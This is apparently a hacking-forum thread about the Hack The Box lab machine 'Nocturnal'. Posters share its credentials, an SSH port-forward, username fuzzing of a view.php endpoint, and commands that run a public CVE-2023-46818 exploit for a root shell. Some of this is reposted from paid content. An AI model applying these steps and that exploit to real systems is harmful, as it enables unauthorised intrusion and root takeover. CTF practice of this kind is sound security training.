Nocturnal Hack the Box Season 7 (Linux Easy)
by RedBlock - Saturday April 12, 2025 at 06:18 PM
#21
(04-12-2025, 11:25 PM)machakilos Wrote: here so u dont have to pay : Tobias Credentials (needed for further steps):
tobiasConfusedlowmotionapocalypse

1. Do port forwarding of the 8080 port of the machine to your local machine with SSH:
ssh -L 9999:127.0.0.1:8080 tobias@nocturnal.htb

2. Read user flag:
cat usert.txt

3. On your local machine clone the following repo and exploit the vulnerability:
$ git clone https://github.com/bipbopbup/CVE-2023-46...xploit.git
$ cd CVE-2023-46818-python-exploit
$ python3 exploit.py http://127.0.0.1:9999/ admin slowmotionapocalypse

4. The exploit will provide you with a root shell into the machine, then you can read the root.txt flag:
cat /root/root.txt
Ah man you already shared it ?
I missed it
Mine is almost same and this one is also working fine so no need to pay 8 creds on mine shares method. Sad life.
Hack the Box Season 8

https://t.me/+u1sCX38Xneo3OGM1
Reply
#22
(04-12-2025, 09:16 PM)samuelballsiu1 Wrote:
(04-12-2025, 09:12 PM)hujson Wrote:
(04-12-2025, 08:59 PM)samuelballsiu1 Wrote:
(04-12-2025, 08:53 PM)hujson Wrote:
(04-12-2025, 08:10 PM)maggi Wrote: log into site as Amanda

Download backup

Dump the DB

ssh as that user

check local ports for interesting things

how to download the sql dump I'm geting a 403.

Login as amanda:arHkG7HAI68X8s1J

Create backup with the password arHkG7HAI68X8s1J

and unzip with the same password arHkG7HAI68X8s1J

Thanks it worked. But how did you find the creds for that account?

find the privacy.odt file in amanda's files with bruteforcing the username at the /view.php endpoint. After you've done that you can unzip the .odt file and grep for "pass" to find the password for that account

What Wordlist you was use for Bruteforce that have inside the amanda User?
Reply
#23
(04-13-2025, 05:15 AM)RedBlock Wrote:
(04-12-2025, 11:25 PM)machakilos Wrote: here so u dont have to pay : Tobias Credentials (needed for further steps):
tobiasConfusedlowmotionapocalypse

1. Do port forwarding of the 8080 port of the machine to your local machine with SSH:
ssh -L 9999:127.0.0.1:8080 tobias@nocturnal.htb

2. Read user flag:
cat usert.txt

3. On your local machine clone the following repo and exploit the vulnerability:
$ git clone https://github.com/bipbopbup/CVE-2023-46...xploit.git
$ cd CVE-2023-46818-python-exploit
$ python3 exploit.py http://127.0.0.1:9999/ admin slowmotionapocalypse

4. The exploit will provide you with a root shell into the machine, then you can read the root.txt flag:
cat /root/root.txt
Ah man you already shared it ?
I missed it
Mine is almost same and this one is also working fine so no need to pay 8 creds on mine shares method. Sad life.
Just remove the 8 credits bro or at least put 1 lol
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Reposting hidden content for free
Reply
#24
(04-12-2025, 08:10 PM)maggi Wrote:
(04-12-2025, 07:35 PM)kkkgrukckhko Wrote: We can use this syntax to check our uploads:

nocturnal.htb/view.php?username=amanda&file=privacy.odt

but i doesnt make my revshell work idk why, any suggest?

log into site as Amanda

Download backup

Dump the DB

ssh as that user

check local ports for interesting things

How did you find the name amanda??
Reply
#25
(04-12-2025, 11:25 PM)machakilos Wrote: here so u dont have to pay : Tobias Credentials (needed for further steps):
tobiasConfusedlowmotionapocalypse

1. Do port forwarding of the 8080 port of the machine to your local machine with SSH:
ssh -L 9999:127.0.0.1:8080 tobias@nocturnal.htb

2. Read user flag:
cat usert.txt

3. On your local machine clone the following repo and exploit the vulnerability:
$ git clone https://github.com/bipbopbup/CVE-2023-46...xploit.git
$ cd CVE-2023-46818-python-exploit
$ python3 exploit.py http://127.0.0.1:9999/ admin slowmotionapocalypse

4. The exploit will provide you with a root shell into the machine, then you can read the root.txt flag:
cat /root/root.txt

Thanks man! I really appreciate it.
Reply
#26
$ python3 exploit.py http://127.0.0.1:9999/ admin slowmotionapocalypse

did ot work for me.
needed to reboot box, to get command execution.
Maybe will help someone
Reply
#27
(04-13-2025, 09:48 AM)Liy4 Wrote:
(04-12-2025, 08:10 PM)maggi Wrote:
(04-12-2025, 07:35 PM)kkkgrukckhko Wrote: We can use this syntax to check our uploads:

nocturnal.htb/view.php?username=amanda&file=privacy.odt

but i doesnt make my revshell work idk why, any suggest?

log into site as Amanda

Download backup

Dump the DB

ssh as that user

check local ports for interesting things

How did you find the name amanda??

Use burp suite or ZAP (if you don't have pro burp) to fuzz usernames. You can register an account, upload a dummy file. Then you can click on your uploaded file and intercept that request. Then fuzz the username value with a name list. You can sort the response size to find amanda.
Reply
#28
(04-13-2025, 09:48 AM)Liy4 Wrote:
(04-12-2025, 08:10 PM)maggi Wrote:
(04-12-2025, 07:35 PM)kkkgrukckhko Wrote: We can use this syntax to check our uploads:

nocturnal.htb/view.php?username=amanda&file=privacy.odt

but i doesnt make my revshell work idk why, any suggest?

log into site as Amanda

Download backup

Dump the DB

ssh as that user

check local ports for interesting things

How did you find the name amanda??

fuzing and a wordlist (ffuf is dank)
Reply
#29
thanks for sharing brother
Reply
#30
(04-12-2025, 11:02 PM)bl4cksku11 Wrote: Easy root:

Kappa



That's it! Pwned. Enjoy

how did you found out this vulnerability?
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Cobblestone Hack the Box Season 8 (Linux Insane) RedBlock 0 96 Yesterday, 12:20 PM
Last Post: RedBlock
  Nocturnal Hack the box easy user and root RedBlock 1 425 08-02-2025, 08:42 AM
Last Post: fluffyme
  Primed For Action Challenge.Easy Solution [FREE] pbloraneFH 0 258 04-13-2025, 02:38 PM
Last Post: pbloraneFH
  HTB - Code writeup Season 7 cryptocracks 3 363 04-12-2025, 03:43 PM
Last Post: cryptocracks
  [FREE] HTB/Hack The Box/Challenge: Crypto Not that random f58c34ee9 0 296 04-12-2025, 03:11 PM
Last Post: f58c34ee9

Forum Jump:


 Users browsing this thread: